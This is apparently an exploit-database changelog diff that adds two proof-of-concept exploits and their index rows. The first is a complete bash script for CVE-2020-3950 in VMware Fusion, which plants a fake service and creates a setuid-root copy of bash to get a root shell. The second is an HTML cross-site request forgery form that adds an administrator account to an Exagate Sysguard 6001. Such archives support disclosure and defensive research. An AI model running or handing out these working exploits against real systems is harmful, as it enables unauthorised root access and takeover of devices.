DB: 2020-03-21

2 changes to exploits/shellcodes

VMware Fusion 11.5.2 - Privilege Escalation

Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)

exploits/macos/local/48235.sh

@@ -0,0 +1,43 @@
+# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
+# Date: 2020-03-17
+# Exploit Author: Rich Mirch
+# Vendor Homepage: https://www.vmware.com/products/fusion.html
+# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
+# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
+# Versions:
+# VMware Fusion Professional 11.5.1 (15018442)
+# VMware Fusion Professional 11.5.2 (15794494)
+#
+# Tested on: macOS 10.14.6
+# CVE : CVE-2020-3950
+# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
+#
+#
+#!/bin/bash
+echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"
+
+mkdir -p ~/a/b/c
+mkdir -p ~/Contents/Library/services
+
+cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
+#!/usr/bin/python
+import os
+os.setuid(0)
+os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
+EOF
+
+chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service
+
+cd ~/a/b/c
+ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
+"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
+p=$!
+echo "Sleeping for 5 seconds"
+sleep 5
+kill ${p?}
+wait
+
+echo "Sleeping for 7 seconds"
+sleep 7
+
+$HOME/.woot -p

exploits/php/webapps/48234.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.exagate.com/
+# Software Link: https://www.exagate.com/sysguard-6001
+# Version: SYSGuard 6001
+
+HTML CSRF PoC :
+
+<html>
+  <body>
+    <form action="http://target/kulyon.php" method="POST">
+      <input type="hidden" name="username" value="joke" />
+      <input type="hidden" name="password" value="159384" />
+      <input type="hidden" name="privilege" value="0" />
+      <input type="hidden" name="button" value="Ekle" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

files_exploits.csv

@@ -10994,6 +10994,7 @@ id,file,description,date,author,type,platform,port
 48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
 48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
+48235,exploits/macos/local/48235.sh,"VMware Fusion 11.5.2 - Privilege Escalation",2020-03-20,"Rich Mirch",local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42484,3 +42485,4 @@ id,file,description,date,author,type,platform,port
 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
+48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,